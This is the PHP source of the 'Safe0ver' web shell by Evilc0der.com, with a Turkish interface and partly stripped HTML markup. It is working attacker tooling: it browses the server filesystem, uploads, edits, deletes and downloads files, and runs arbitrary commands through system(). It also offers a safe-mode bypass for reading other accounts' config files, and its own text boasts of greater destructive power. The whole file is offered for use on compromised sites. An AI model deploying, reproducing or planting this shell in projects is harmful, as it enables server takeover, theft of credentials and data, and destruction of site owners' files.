=4); $scriptTitle = "Safe0ver"; $scriptident = "$scriptTitle By Evilc0der.com"; $urlAdd = ""; $formAdd = ""; function walkArray($array){ while (list($key, $data) = each($array)) if (is_array($data)) { walkArray($data); } else { global $$key; $$key = $data; global $urlAdd; $urlAdd .= "$key=".urlencode($data)."&";} } if (isset($_PUT)) walkArray($_PUT); if (isset($_GET)) walkArray($_GET); if (isset($_POST)) walkArray($_POST); $pos = strpos($urlAdd, "s=r"); if (strval($pos) != "") { $urlAdd= substr($urlAdd, 0, $pos); } $urlAdd .= "&s=r&"; if (empty($Pmax)) $Pmax = 125; /* Identifies the max amount of Directories and files listed on one page */ if (empty($Pidx)) $Pidx = 0; $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir ))); $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file ))); $scriptdate = "7 Subat 2007"; $scriptver = "Bet@ Versiyon"; $LOCAL_IMAGE_DIR = "img"; $REMOTE_IMAGE_URL = "img"; $img = array( "Edit" => "edit.gif", "Download" => "download.gif", "Upload" => "upload.gif", "Delete" => "delete.gif", "View" => "view.gif", "Rename" => "rename.gif", "Move" => "move.gif", "Copy" => "copy.gif", "Execute" => "exec.gif" ); while (list($id, $im)=each($img)) if (file_exists("$LOCAL_IMAGE_DIR/$im")) $img[$id] = "\"$id\""; else $img[$id] = "[$id]"; /* HTTP AUTHENTICATION */ if ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) || $PHP_AUTH_USER != $http_auth_user || $PHP_AUTH_PW != $http_auth_pass) || (($logoff==1) && $noauth=="yes") ) { setcookie("noauth",""); Header( "WWW-authenticate: Basic realm=\"$scriptTitle $scriptver\""); Header( "HTTP/1.0 401 Unauthorized"); echo "Your username or password is incorrect"; exit ; } function buildUrl($display, $url) { global $urlAdd; $url = $SFileName . "?$urlAdd$url"; return "$display"; } function sp($mp) { for ( $i = 0; $i < $mp; $i++ ) $ret .= " "; return $ret; } function spacetonbsp($instr) { return str_replace(" ", " ", $instr); } function Mydeldir($Fdir) { if (is_dir($Fdir)) { $Fh=@opendir($Fdir); while ($Fbuf = readdir($Fh)) if (($Fbuf != ".") && ($Fbuf != "..")) Mydeldir("$Fdir/$Fbuf"); @closedir($Fh); return rmdir($Fdir); } else { return unlink($Fdir); } } function arrval ($array) { list($key, $data) = $array; return $data; } function formatsize($insize) { $size = $insize; $add = "B"; if ($size > 1024) { $size = intval(intval($size) / 1.024)/1000; $add = "KB"; } if ($size > 1024) { $size = intval(intval($size) / 1.024)/1000; $add = "MB"; } if ($size > 1024) { $size = intval(intval($size) / 1.024)/1000; $add = "GB"; } if ($size > 1024) { $size = intval(intval($size) / 1.024)/1000; $add = "TB"; } return "$size $add"; } if ($cmd != "downl") { ?> <?php echo $SFileName ?>
- -

".sp(3)."\n\n\n\n Klasör Listelenemiyor!Lütfen Bypass Bölümünü Deneyin.
".sp(3)."\n Script Gecisi Tamamlayamadi!

".sp(3)."\n Klasöre Girmek Icin yetkiniz Olduguna emin Olunuz...

\n\n\n\n"; } if (function_exists('realpath')) { $partdir = realpath($dir); } else { $partdir = $dir; } if (strlen($partdir) >= 100) { $partdir = substr($partdir, -100); $pos = strpos($partdir, "/"); if (strval($pos) != "") { $partdir = "<-- ...".substr($partdir, $pos); } $partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir ))); $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir ))); $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file ))); } ?>
" method="POST">
 Safe0ver-Server File Browser... 

$Pmax ) { $from = $Pidx * $Pmax; $to = ($Pidx + 1) * $Pmax-1; if ($to - count($filelist) - 1 + ($Pmax / 2) > 0 ) $to = count($filelist) - 1; if ($to > count($filelist)-1) $to = count($filelist)-1; $Dcontents = array(); For ($Fi = $from; $Fi <= $to; $Fi++) { $Dcontents[] = $filelist[$Fi]; } } else { $Dcontents = $filelist; } $tdcolors = array("lighttd", "darktd"); while (list ($key, $file) = each ($Dcontents)) { if (!$tdcolor=arrval(each($tdcolors))) { reset($tdcolors); $tdcolor = arrval(each($tdcolors)); } if (is_dir("$dir/$file")) { /* */ /* */ echo "\n"; /* */ echo "\n"; /* */ echo "\n"; /* */ echo "\n"; /* */ echo ""; echo "\n"; } else { /* */ /* */ if ( @is_readable("$dir/$file") ) echo "\n"; else echo "\n"; /* */ echo "\n"; /* */ echo "\n"; /* */ echo "\n"; /* */ echo ""; echo "\n"; } } echo "
 Dosya Adi   Yapilabilecekler    Boyut   Yetkiler   Son Düzenleme 
".sp(3).buildUrl( "[$file]", "cmd=dir&dir=$dir/$file") .sp(9)."
".sp(2)."\n"; /* */ if ( ($file != ".") && ($file != "..") ) echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n"; /* */ if ( ($file != ".") && ($file != "..") ) echo sp(3).buildUrl( $img["Delete"], "cmd=deldir&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n"; /* */ echo "  
   \n"; echo "D"; if ( @is_readable("$dir/$file") ) { echo "R"; } if (function_exists('is_writeable')) { if ( @is_writeable("$dir/$file") ) { echo "W"; } } else { echo "(W)"; } if ( @is_executable("$dir/$file") ) { echo "X"; } echo "  \n"; echo "  ".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."  "; echo "
".sp(3).buildUrl( $file, "cmd=file&file=$dir/$file").sp(9)."
  \n"; /* */ echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n"; /* */ if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) ) echo buildUrl( $img["Edit"], "cmd=edit&file=$dir/$file").sp(3)."\n"; /* */ echo buildUrl( $img["Copy"], "cmd=copy&file=$dir/$file")."\n"; /* */ if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) ) echo sp(3). buildUrl( $img["Move"], "cmd=move&file=$dir/$file")."\n"; /* */ echo sp(3). buildUrl( $img["Delete"], "cmd=delfile&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n"; /* */ echo sp(3). buildUrl( $img["Download"], "cmd=downl&file=$dir/$file")."\n"; /* */ if ( @is_executable("$dir/$file") ) echo sp(3).buildUrl( $img["Execute"], "cmd=execute&file=$dir/$file")."\n"; /* */ echo sp(2)."
\n"; $size = @filesize("$dir/$file"); If ($size != false) { $filesizes += $size; echo "  ".formatsize($size).""; } else echo "  0 B"; echo "    \n"; if ( @is_readable("$dir/$file") ) echo "R"; if ( @is_writeable("$dir/$file") ) echo "W"; if ( @is_executable("$dir/$file") ) echo "X"; if (function_exists('is_uploaded_file')){ if ( @is_uploaded_file("$dir/$file") ) echo "U"; } else { echo "(U)"; } echo "  \n"; echo "  ".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."  "; echo "
\n\n"; function printpagelink($a, $b, $link = ""){ if ($link != "") echo "| $a - $b |"; else echo "| $a - $b |"; } if ( count($filelist)-1 > $Pmax ) { echo ""; } echo "
\n"; echo "  ".@count ($dirn)." Klasör, ".@count ($filen)." Dosya  \n"; echo "\n"; echo "  Toplam Dosya Boyutu: ".formatsize($filesizes)."  
"; $Fi = 0; while ( ( (($Fi+1)*$Pmax) + ($Pmax/2) ) < count($filelist)-1 ) { $from = $Fi*$Pmax; while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; $to = ($Fi + 1) * $Pmax - 1; if ($Fi == $Pidx) $link=""; else $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi"; printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link); echo "   "; $Fi++; } $from = $Fi*$Pmax; while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; $to = count($filelist)-1; if ($Fi == $Pidx) $link=""; else $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi"; printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link); echo "
"; if ($isGoodver) { echo "\n"; } else { echo "\n"; } /* */ echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo ""; echo "
 PHP Versiyonu:    $PHPVer 
 Server's PHP Version:    $PHPVer (Some functions might be unavailable...) 
 Diger Islemler:    ".buildUrl( "| Yeni Dosya |", "cmd=newfile&lastcmd=dir&lastdir=$dir")."\n".sp(3). buildUrl( "| Yeni Klasör |", "cmd=newdir&lastcmd=dir&lastdir=$dir")."\n".sp(3). buildUrl( "| Dosya Yükle |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir"). "\n
 Script Location:    $PATH_TRANSLATED
 IP Adresin:    $REMOTE_ADDR 
 Bulundugun Klasör:   $partdir 
 Semboller:  \n"; echo ""; echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo "
D:  Klasör.
R:  Okunabilir.
W:  Yazilabilir.
X:  Komut Calistirilabilir.
U:  HTTP Uploaded File.
"; echo "
"; @closedir($h); } elseif ( $cmd=="execute" ) {/**/ echo system("$file"); } elseif ( $cmd=="deldir" ) { /* */ echo "
"; } elseif ( $cmd=="delfile" ) { /* */ echo "
" ; if ($auth == "yes") { if (Mydeldir($file)==false) { echo "Could not remove \"$file\"
Permission denied, or directory not empty..."; } else { echo "Successfully removed \"$file\"
"; } echo ""; } else { echo "Are you sure you want to delete \"$file\" and all it's subdirectories ?
"; } echo "
"; } elseif ( $cmd=="newfile" ) { /* */ echo "
" ; if ($auth == "yes") { if (@unlink($file)==false) { echo "Could not remove \"$file\"
"; } else { echo "Successfully removed \"$file\"
"; } echo "
"; } else { echo "Are you sure you want to delete \"$file\" ?
"; } echo "
"; $i = 1; while (file_exists("$lastdir/newfile$i.txt")) $i++; $file = fopen("$lastdir/newfile$i.txt", "w+"); if ($file == false) echo "Could not create the new file...
"; else echo "Successfully created: \"$lastdir/newfile$i.txt\"
"; echo "
"; } elseif ( $cmd=="newdir" ) { /* */ echo "
" ; $i = 1; while (is_dir("$lastdir/newdir$i")) $i++; $file = mkdir("$lastdir/newdir$i", 0777); if ($file == false) echo "Could not create the new directory...
"; else echo "Successfully created: \"$lastdir/newdir$i\"
"; echo "
"; } elseif ( $cmd=="edit" ) { /* */ $contents = ""; $fc = @file( $file ); while ( @list( $ln, $line ) = each( $fc ) ) { $contents .= htmlentities( $line ) ; } echo "
"; echo "M
\n"; echo "\n"; echo "EDIT FILE: $file
\n"; echo "
\n"; echo "\n"; echo ""; echo "
"; echo "
"; } elseif ( $cmd=="saveedit" ) { /* */ $fo = fopen($file, "w"); $wrret = fwrite($fo, stripslashes($contents)); $clret = fclose($fo); } elseif ( $cmd=="downl" ) { /* */ $downloadfile = urldecode($file); if (function_exists("basename")) $downloadto = basename ($downloadfile); else $downloadto = "download.ext"; if (!file_exists("$downloadfile")) echo "The file does not exist"; else { $size = @filesize("$downloadfile"); if ($size != false) { $add="; size=$size"; } else { $add=""; } header("Content-Type: application/download"); header("Content-Disposition: attachment; filename=$downloadto$add"); $fp=fopen("$downloadfile" ,"rb"); fpassthru($fp); flush(); } } elseif ( $cmd=="upload" ) { /* */ ?>
Dosya Yükleme Sekmesine Tikladiniz !
Eger Yüklemek istediginiz Dosya mevcut ise üzerine Yazilir.

" method="post"> Dosya Yükle:

" method="POST">
*/ echo "
"; if (file_exists($userfile)) $res = copy($userfile, "$dir/$userfile_name"); echo "Uploaded \"$userfile_name\" to \"$userfile\";
\n"; if ($res) { echo "Basariyla Yüklendi \"$userfile\" to \"$dir/$userfile_name\".\n

"; echo "Yüklenen Dosya Adi: \"$userfile_name\".\n
Dosya Adi: \"$userfile\".\n
"; echo "Dosya Boyutu: ".formatsize($userfile_size).".\n
Filetype: $userfile_type.\n
"; } else { echo "Yüklenemedi..."; } echo "
" ; echo "

"; } elseif ( $cmd=="file" ) { /* */ echo "
"; $fc = @file( $file ); while ( @list( $ln, $line ) = each( $fc ) ) { echo spacetonbsp(@htmlentities($line))."
\n"; } echo "
"; } elseif ( $cmd=="ren" ) { /* */ if (function_exists('is_dir')) { if (is_dir("$oldfile")) { $objname = "Directory"; $objident = "Directory"; } else { $objname = "Filename"; $objident = "file"; } } echo "
 Rename a file: 

\n"; If (empty($newfile) != true) { echo "
"; $return = @rename($oldfile, "$olddir$newfile"); if ($return) { echo "$objident renamed successfully:

Old $objname: \"$oldfile\".
New $objname: \"$olddir$newfile\""; } else { if ( @file_exists("$olddir$newfile") ) { echo "Error: The $objident does already exist...


Hit your browser's back to try again..."; } else { echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it."; } } echo "
" ; } else { $dpos = strrpos($oldfile, "/"); if (strval($dpos)!="") { $olddir = substr($oldfile, 0, $dpos+1); } else { $olddir = "$lastdir/"; } $fpos = strrpos($oldfile, "/"); if (strval($fpos)!="") { $inputfile = substr($oldfile, $fpos+1); } else { $inputfile = ""; } echo "
\n"; echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo "Rename \"$oldfile\" to:
\n"; echo "
"; echo "
"; echo "
"; } } else if ( $cmd == "con") { ?>
*/ $isMainMenu = true; ?>
 -<[{ Main Menu }]>- 

##Safe0ver##", "cmd=dir&dir=.").sp(2); ?> Safe0ver Shell Piyasada Bulunan Bir Cok Shell'in Kodlarindan(c99,r57 vs...) Sentezlenerek Kodlanmistir.Entegre Olarak Bypass Özelligi Eklenmis Ve Böylece Tahrip Gücü Yükseltilmistir.Yazilimimiz Hic bir Virus,worm,trojan gibi Kullaniciyi Tehdit Eden Veya Sömüren yazilimlar Icermemektedir.


Bypass Kullaným:Cat /home/evilc0der/public_html/config.php Gibi Olmalidir.

Safe Mode ByPAss

" name="dizin">


$safemodgec"; } ?>

  [ Main Menu ] ", "cmd=&dir="); ?>          [ R00T ] ", "cmd=dir&dir=."); ?>   

  - -